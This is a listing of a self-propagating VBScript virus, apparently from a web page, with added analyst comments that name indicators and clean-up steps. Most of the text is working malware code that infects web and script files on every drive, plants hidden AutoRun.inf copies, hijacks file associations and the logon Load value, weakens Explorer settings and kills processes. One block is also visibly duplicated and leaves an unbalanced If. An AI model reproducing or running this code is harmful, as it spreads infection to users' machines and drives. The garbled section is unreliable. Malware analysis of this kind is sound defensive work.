  449.     Set objshell = CreateObject("WScript.Shell")
  450.     FullPath_Self = WScript.ScriptFullName
  451.     Name_Self = WScript.ScriptName
  452.     Names = Array("HJLMRRQRWYOZX", "WQKAULMNKKG")
  453.     Set oArgs = WScript.Arguments
  454.     ArgNum = 0
  455.     Do While ArgNum < oArgs.Count
  456.         Para_V = Para_V & " " & oArgs(ArgNum)
  457.         ArgNum = ArgNum + 1
  458.     Loop
  459.     SubPara_V = LCase(Right(Para_V, 3))
  460.     Select Case SubPara_V
  461.         Case "run"
  462.             RunPath = Left(FullPath_Self, 2)
  463.             Call Run(RunPath)
  464.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  465.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  466.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  467.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  468.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  469.             Call Run(FullPath_V1)
  470.         Case "txt", "log"
  471.             RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
  472.             Call Run(RunPath)
  473.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  474.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  475.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  476.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  477.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  478.             Call Run(FullPath_V1)
  479.         Case "reg"
  480.             Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
  481.             Call Run(Para_V)
  482.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  483.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  484.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  485.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  486.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  487.             Call Run(FullPath_V1)
  488.         Case "chm"
  489.             Para_V = "hh.exe " & """" & Trim(Para_V) & """"
  490.             Call Run(Para_V)
  491.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  492.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  493.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  494.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  495.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  496.             Call Run(FullPath_V1)
  497.         Case "hlp"
  498.             Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
  499.             Call Run(Para_V)
  500.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  501.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  502.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  503.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  504.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  505.             Call Run(FullPath_V1)
  506.         Case Else
  507.             If PreInstance = True Then
  508.                 WScript.Quit
  509.             End If
  510.             If IsOK(objfso, Date(), FullPath_Config) = False Then
  511.                 If objfso.FileExists(FullPath_Config) = True Then
  512.                     Order = Trim(ReadOK(objfso, FullPath_Config))
  513.                     Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
  514.                     Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) - InStr(1, Order, "@")))
  515.                 End If
  516.                 Select Case Order_Order
  517.                 Case "InfectFiles"
  518.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  519.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  520.                     VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
  521.                     VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
  522.                     VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
  523.                     VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
  524.                     VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
  525.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  526.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  527.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  528.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  529.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  530.                     Order_Para = Order_Para + Cnt
  ' NOTE(review): listing lines 532-537 repeat lines 525-530, and the If opened on
  ' listing line 531 has no matching End If before Case "Msg". This looks like a paste
  ' duplication in the posted copy; as shown, the block structure is unbalanced.
  ' TODO confirm against another copy of the sample before relying on this branch.
  531.                     If Order_Para>2000 Then
  532.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  533.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  534.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  535.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  536.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  537.                     Order_Para = Order_Para + Cnt
  538.                     If Order_Para>2000 Then
  539.                         Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465*** -_- !")
  540.                     Else
  541.                         Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para)
  542.                     End If
  543.                     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  544.                     Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  545.                 Case "Msg"
  546.                     MsgBox Order_Para
  547.                     Call WriteOK(objfso, FullPath_Config, "", "")
  548.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  549.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  550.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  551.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  552.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  553.                     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  554.                     Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  555.                 Case "UnLoadMe"
  556.                     Call RestoreSystem(objfso)
  557.                     Wscript.Quit
  558.                 Case "Kill<span class="searchlite">Virus</span>"
  559.                     Call RestoreSystem(objfso)
  560.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
  561.                     Wscript.Quit
  562.                 Case Else
  563.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  564.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  565.                     VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
  566.                     VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
  567.                     VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
  568.                     VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
  569.                     VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
  570.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  571.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  572.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  573.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  574.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  575.                     Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
  576.                     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  577.                     Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  578.             End Select
  579.         Else
  580.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  581.             MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  582.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V 'build the complete body of the script
  583.            VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode) 'change the order in which the modules are combined
  584.            VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names) 'change the module marker names
  585.            Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  586.         End If
  587.     End Select
  588.     Set objfso = Nothing
  589.     Set objshell = Nothing
  590. End Sub
  591. 'WQKAULMNKKG1_3
  592. 'HJLMRRQRWYOZX1_1
  ' Module 1_1: global state shared by every procedure in the listing, then the entry call.
  '   Cnt / CntMax      files rewritten in this run and the cap (1000) on that number;
  '   Version           single character appended to the head marker;
  '   Name_V1           dropped script name, <GetUserName()>.vbs;
  '   FullPath_V0 / _V1 that name under FSO special folder 0 (Windows) and 1 (System);
  '   FullPath_Config   <GetUserName()>.ini under special folder 1, the state/command file;
  '   Sum_ModelCode     number of marker-delimited modules (26);
  '   Head_V / Tail_V   infection markers from GetHeadTail;
  '   ModelHead / ModelTail   prefixes of the per-module marker comments.
  ' The paths built here are the file-system artefacts to look for on a suspect host.
  ' The <span class="searchlite"> tags are search-highlight markup left by the hosting
  ' page, not part of the script.
  593. On Error Resume Next
  594. Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
  595. Dim ModelHead, ModelTail
  596. Cnt = 0
  597. CntMax = 1000
  598. Version = "4"
  599. Name_V1 = GetUserName() & ".vbs"
  600. FullPath_V0 = GetSFolder(0) & Name_V1 'mainly handles the file-association redirect
  601. FullPath_V1 = GetSFolder(1) & Name_V1 'mainly executes the config-file commands
  602. FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
  603. Sum_ModelCode = 26
  604. Head_V= GetHeadTail(0)
  605. Tail_V= GetHeadTail(1)
  606. ModelHead="'HJLMRRQRWYOZX"
  607. ModelTail="'WQKAULMNKKG"
  608. Call <span class="searchlite">Virus</span>Main()
  609. Sub <span class="searchlite">Virus</span>Main()
           ' Thin entry wrapper: suppresses runtime errors and hands control to the
           ' dispatcher routine called below (its definition is outside this excerpt).
  610.     On Error Resume Next
  611.     Call ExeVbs_<span class="searchlite">Virus</span>()
  612. End Sub
  613. 'WQKAULMNKKG1_1
  614. 'HJLMRRQRWYOZX2_19
  615. Function GetVersion(objfso, path_v)
           ' Returns the one character that follows the Head_V marker in the file at
           ' path_v. Callers compare it with the global Version to decide whether an
           ' existing copy is older and should be replaced.
           '   objfso - a FileSystemObject instance supplied by the caller
           '   path_v - path of the file to inspect
  616.     Dim FV, buffer
           ' Mode 1 = ForReading; the whole file is loaded into memory.
  617.     Set FV = objfso.OpenTextFile(path_v, 1)
  618.     buffer = FV.ReadAll()
  619.     GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
  620. End Function
  621. Function GetScriptCode(Languages)
           ' Returns the text of the first script element in the hosting document whose
           ' Language attribute (lower-cased) equals Languages and is either "vbscript"
           ' or "javascript". Returns Empty when nothing matches.
           ' Relies on a global "document" object, so it presumably only does anything
           ' when the code runs inside an HTML/HTA page - confirm against the caller.
  622.     On Error Resume Next
  623.     Dim soj
  624.     For Each soj In document.Scripts
  625.         If LCase(soj.Language) = Languages Then
  626.             Select Case LCase(soj.Language)
  627.                 Case "vbscript"
  628.                     GetScriptCode = soj.Text
  629.                     Exit Function
  630.                 Case "javascript"
  631.                     GetScriptCode = soj.Text
  632.                     Exit Function
  633.             End Select
  634.         End If
  635.     Next
  636. End Function
  637. Function GetSelfCode(objfso, FullPath_Self)
           ' Reads the file at FullPath_Self and returns the slice that starts at the
           ' first Head_V marker and runs through the last Tail_V marker. This is how the
           ' sample recovers its own body from whatever host file it is running in.
           ' Analyst note: the same Head_V/Tail_V span is what a cleaner would need to
           ' cut out of an infected hta/htm/html/asp/vbs file.
  638.     On Error Resume Next
  639.     Dim n, n1, buffer, Self
           ' Mode 1 = ForReading.
  640.     Set Self = objfso.OpenTextFile(FullPath_Self, 1)
  641.     buffer = Self.ReadAll
           ' n = first occurrence of the head marker, n1 = last occurrence of the tail marker.
  642.     n = InStr(buffer, Head_V)
  643.     n1 = InstrRev(buffer, Tail_V)
  644.     buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
  645.     GetSelfCode = buffer
  646.     Self.Close
  647. End Function
  648. Function GetMainBody(vbsCode, Sum_ModelCode)
           ' Concatenates modules 2 through Sum_ModelCode, each extracted from vbsCode by
           ' GetModelCode (defined outside this excerpt) and separated by CRLF.
           ' Module 1 is skipped here.
  649.     Dim i
  650.     For i = 2 To Sum_ModelCode
  651.         GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
  652.     Next
  653. End Function
  654. 'WQKAULMNKKG2_19
  655. 'HJLMRRQRWYOZX2_13
  656. Sub DeSafeSet()
           ' Weakens three Explorer settings through WriteReg (all REG_DWORD):
           '   - NoDriveTypeAutoRun = 129 (0x81) in the per-user Explorer policy key. In
           '     this bitmask a set bit disables AutoRun for one drive type; 0x81 sets only
           '     the two "unknown type" bits, so AutoRun stays enabled for ordinary drive
           '     types (verify against Microsoft's NoDriveTypeAutoRun documentation).
           '   - ShowSuperHidden = 0, so protected operating-system files are not shown.
           '   - ...\Hidden\SHOWALL\CheckedValue = 0, which stops the "show hidden files"
           '     option in Folder Options from taking effect.
           ' Defender note: these three values are useful indicators, and restoring them
           ' is part of clean-up (SafeSet in this listing resets two of them).
  657.     Dim HLMShow , HCUAdvanced, HCUExplorer
  658.     HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  659.     HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  660.     HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
  661.     Call WriteReg (HCUExplorer, 129, "REG_DWORD")
  662.     Call WriteReg (HCUAdvanced, 0, "REG_DWORD")
  663.     Call WriteReg (HLMShow, 0, "REG_DWORD")
  664. End Sub
  665. Sub SafeSet()
           ' Counterpart of DeSafeSet: writes 1 to Explorer's Hidden and ShowSuperHidden
           ' values and to SHOWALL\CheckedValue, which makes hidden and protected files
           ' visible again. It does not touch NoDriveTypeAutoRun: HCUExplorer is declared
           ' but never assigned or written here.
           ' HCUAdvanced is used without being declared in this Sub (HCUSSHidden is
           ' declared instead), so it is not one of this Sub's local variables.
  666.     Dim HLMShow , HCUSSHidden, HCUHidden
  667.     Dim HCUExplorer
  668.     HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  669.     HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  670.     HCUHidden = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
  671.     Call WriteReg (HCUHidden, 1, "REG_DWORD")
  672.     Call WriteReg (HCUAdvanced, 1, "REG_DWORD")
  673.     Call WriteReg (HLMShow, 1, "REG_DWORD")
  674. End Sub
  675. 'WQKAULMNKKG2_13
  676. 'HJLMRRQRWYOZX2_23
  677. Function MakeScript(strCode, T)
           ' Wraps strCode in a VBScript SCRIPT element for embedding in a web page.
           '   T = 1     - strCode is first passed through ChangeModelOrder (defined
           '               outside this excerpt), so the module order differs per copy
           '   otherwise - strCode is embedded unchanged
           ' The tag text is assembled from "<" & "SCRIPT ..." pieces; presumably so the
           ' literal tag never appears in this source when it is itself embedded in HTML
           ' - confirm.
           ' Analyst note: because module order is shuffled, signatures should key on the
           ' module marker comments rather than on a fixed byte sequence.
  678.     If T = 1 Then
  679.         MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "</" & "SCRIPT>"
  680.     Else
  681.         MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "</" & "SCRIPT>"
  682.     End If
  683. End Function
  684. 'WQKAULMNKKG2_23
  685. 'HJLMRRQRWYOZX1_6
  686. Sub AutoRun(objfso, D, vbsCode)
           ' Places a copy of the script plus an AutoRun.inf in the root of drive D.
           '   objfso  - FileSystemObject supplied by the caller
           '   D       - drive letter (without the colon)
           '   vbsCode - script text written to "<D>:\<Name_V1>"
           ' Nothing is written when both files already exist and the existing script
           ' carries a version that is not lower than Version.
           ' Defender note: a hidden+system AutoRun.inf whose Shellexecute and
           ' shell\...\command entries start WScript.exe with a .vbs and the "AutoRun"
           ' argument is the removable-media indicator for this sample; disabling AutoRun
           ' by policy blocks this path.
  687.     On Error Resume Next
  688.     Dim path_autorun, path_vbs, inf_autorun
  689.     path_autorun = D & ":\AutoRun.inf"
  690.     path_vbs = D & ":\" & Name_V1
  691.     If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)<Version Then
               ' Remove whatever is there first (forced delete, read-only files included).
  692.         If objfso.FileExists(path_autorun) = True Then
  693.             objfso.DeleteFile path_autorun, True
  694.         End If
  695.         If objfso.FileExists(path_vbs) = True Then
  696.             objfso.DeleteFile path_vbs, True
  697.         End If
  698.         Call CopyFile(objfso, vbsCode, path_vbs)
  699.         Call SetFileAttr(objfso, path_vbs)
               ' The two Chinese menu captions below read "Open(&O)" and "Explorer(&X)":
               ' the drive's context-menu entries are relabelled to look like the normal ones.
  700.         inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun=打开(&O)" & VBCRLF & "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun1=资源管理器(&X)" & VBCRLF & "shell\AutoRun1\command=WScript.exe " & Name_V1 & " ""AutoRun"""
  701.         Call CopyFile(objfso, inf_autorun, path_autorun)
  702.         Call SetFileAttr(objfso, path_autorun)
  703.     End If
  704. End Sub
  705. 'WQKAULMNKKG1_6
  706. 'HJLMRRQRWYOZX2_14
  707. Function ReadOK(objfso, FullPath_OK)
           ' Reads the state file at FullPath_OK and returns up to 50 characters that
           ' follow the text "Order:", with trailing spaces removed. WriteOK stores that
           ' field as "<order>@<parameter>".
           ' Errors (for example a missing file) are suppressed.
  708.     On Error Resume Next
  709.     Dim vf, buffer
           ' Mode 1 = ForReading.
  710.     Set vf = objfso.OpenTextFile(FullPath_OK, 1)
  711.     buffer = vf.ReadAll
           ' + 6 skips over the six characters of "Order:".
  712.     ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
  713. End Function
  714. Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
           ' Rewrites the state file at FullPath_OK with three lines:
           '   line 1: "OK"
           '   line 2: the current date (Date())
           '   line 3: "Order:<Order_Order>@<Order_Para>"
           ' and then marks it hidden+system via SetFileAttr. IsOK reads the first lines
           ' back and ReadOK reads the Order field.
           ' Analyst note: this file's format and location (see FullPath_Config) make it
           ' a convenient host indicator.
  715.     On Error Resume Next
  716.     Dim vf1
  717.     objfso.DeleteFile FullPath_OK, True
           ' Mode 2 = ForWriting; the third argument creates the file if it is missing.
  718.     Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
  719.     vf1.Write "OK" & VBCRLF
  720.     vf1.WriteLine Date()
  721.     vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
  722.     Call SetFileAttr(objfso, FullPath_OK)
  723. End Sub
  724. 'WQKAULMNKKG2_14
  725. 'HJLMRRQRWYOZX2_24
  726. Sub KillProcess(ProcessNames)
           ' Terminates every running process whose image name is in ProcessNames.
           '   ProcessNames - collection/array of image names (e.g. "x.exe")
           ' Each name is looked up through WMI (Win32_Process on the local machine) and
           ' Terminate is called on every match. When Terminate returns 2 (access
           ' denied), the code falls back to running tskill through a hidden cmd.exe
           ' window with the ".exe" suffix stripped from the name.
           ' The list of names is supplied by the caller and is not visible here.
           ' Defender note: wscript.exe querying Win32_Process and then spawning
           ' "cmd.exe /c @tskill ..." is a behavioural indicator worth alerting on.
  727.     On Error Resume Next
  728.     Dim objShell, intReturn, name_exe
  729.     Set objShell = WScript.CreateObject("WScript.Shell")
  730.     strComputer = "."
  731.     Set objWMIServices = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  732.     For Each ProcessName in ProcessNames
  733.         Set colProcessList = objWMIServices.Execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
  734.         For Each objProcess in colProcessList
  735.             intReturn = objProcess.Terminate
  736.             Select Case intReturn
  737.                 Case 2
                           ' Drop the last four characters (the ".exe" extension) before calling tskill.
  738.                     name_exe = objProcess.Name
  739.                     name_exe = Left(name_exe, Len(name_exe) -4)
                           ' Window style 0 = hidden; False = do not wait for completion.
  740.                     objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
  741.             End Select
  742.         Next
  743.     Next
  744.     Set objShell = Nothing
  745. End Sub
  746. 'WQKAULMNKKG2_24
  747. 'HJLMRRQRWYOZX1_7
  748. Sub InvadeSystem(objfso, vbsCode)
           ' Installs the script on the host and sets up its persistence. In order:
           '   1. calls AutoRun for every drive of type 1, 2 or 3 (FSO DriveType:
           '      removable, fixed, network);
           '   2. writes hidden+system copies to FullPath_V1 and FullPath_V0, deleting an
           '      existing copy first when its version is lower than Version;
           '   3. points the per-user "Load" value at FullPath_V1 (Windows runs the
           '      program named there at logon);
           '   4. for txtfile, regfile, chm.file and hlpfile, compares the HKLM
           '      shell\open\command default value with Value and, when it differs, calls
           '      the matching Set*FileAss helper (defined outside this excerpt) with
           '      FullPath_V0;
           '   5. calls DeSafeSet to keep hidden files out of view and leave AutoRun on.
           ' Defender note: the Load value and the four open-command values are the
           ' registry indicators; clean-up has to restore the original handlers before
           ' the dropped files are removed, otherwise those file types stop opening.
  749.     On Error Resume Next
  750.     Dim Value, HCULoad, vbsCode_<span class="searchlite">Virus</span>, dc, d
           ' Expected open-command string: WScript.exe, the quoted drop path, then the
           ' original file name and arguments (%1 %*).
  751.     Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
  752.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  753.     vbsCode_<span class="searchlite">Virus</span> = vbsCode
  754.     Set dc = objfso.Drives
  755.     For Each d In dc
  756.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  757.             Call AutoRun(objfso, d.DriveLetter, vbsCode_<span class="searchlite">Virus</span>)
  758.         End If
  759.     Next
           ' Both branches write the copy; the first one only adds a forced delete of the
           ' older file beforehand.
  760.     If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
  761.         objfso.DeleteFile FullPath_V1 , True
  762.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V1)
  763.         Call SetFileAttr(objfso, FullPath_V1)
  764.     Else
  765.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V1)
  766.         Call SetFileAttr(objfso, FullPath_V1)
  767.     End If
  768.     If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version Then
  769.         objfso.DeleteFile FullPath_V0 , True
  770.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V0)
  771.         Call SetFileAttr(objfso, FullPath_V0)
  772.     Else
  773.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V0)
  774.         Call SetFileAttr(objfso, FullPath_V0)
  775.     End If
  776.     If ReadReg(HCULoad)<> FullPath_V1 Then
  777.         Call WriteReg (HCULoad, FullPath_V1, "")
  778.     End If
  779.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  780.         Call SetTxtFileAss(FullPath_V0)
  781.     End If
  782.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
  783.         Call SetRegFileAss(FullPath_V0)
  784.     End If
  785.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
  786.         Call SetchmFileAss(FullPath_V0)
  787.     End If
  788.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
  789.         Call SethlpFileAss(FullPath_V0)
  790.     End If
  791.     Call DeSafeSet()
  792. End Sub
  793. 'WQKAULMNKKG1_7
  794. 'HJLMRRQRWYOZX2_15
  795. Sub SetFileAttr(objfso, pathf)
           ' Sets the attributes of the file at pathf to 6, i.e. Hidden (2) + System (4),
           ' replacing whatever attributes it had. Together with DeSafeSet this keeps the
           ' dropped files out of a default Explorer view.
           ' Analyst note: "dir /a" or any tool that lists hidden+system files still
           ' shows them.
  796.     Dim vf
  797.     Set vf = objfso.GetFile(pathf)
  798.     vf.Attributes = 6
  799. End Sub
  800. 'WQKAULMNKKG2_15
  801. 'HJLMRRQRWYOZX2_18
  802. Function IsOK(objfso, Now_V, path_f)
           ' Reads the first three lines of the state file at path_f and reports whether
           ' it marks the current run as already done.
           '   Returns True when line 1 is "OK" and line 2 equals Now_V (both compared
           '   case-insensitively; StrComp mode 1 = text compare).
           '   Now_V is supplied by the caller; WriteOK stores Date() on line 2, so it is
           '   presumably today's date - confirm against the caller.
           ' Author test switch: when line 3 is exactly "Admin", a message box and an
           ' input prompt appear. The prompt text reads "0: exit; 1: monitor system;
           ' 2: infect files" with the title "SuperVirus script test!". 0 quits the
           ' script, 1 returns True, 2 returns False.
           ' n is not declared in this function.
  803.     On Error Resume Next
  804.     Dim vf, p1, p2, p3
  805.     IsOK = False
           ' Mode 1 = ForReading.
  806.     Set vf = objfso.OpenTextFile(path_f, 1)
  807.     p1 = Trim(vf.ReadLine)
  808.     p2 = Trim(vf.ReadLine)
  809.     p3 = Trim(vf.ReadLine)
  810.     If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then
  811.         IsOK = True
  812.     End If
  813.     If p3 = "Admin" Then
  814.         MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!"
  815.         IsOK = True
  816.         n = InputBox("0:退出; 1:监视系统; 2:传染文件", "Super<span class="searchlite">Virus</span>脚本测试!")
  817.         If n = 0 Then
  818.             Wscript.Quit
  819.         ElseIf n = 1 Then
  820.             IsOK = True
  821.         ElseIf n = 2 Then
  822.             IsOK = False
  823.         End If
  824.     End If
  825. End Function
  826. 'WQKAULMNKKG2_18
  827. 'rotartsinimdA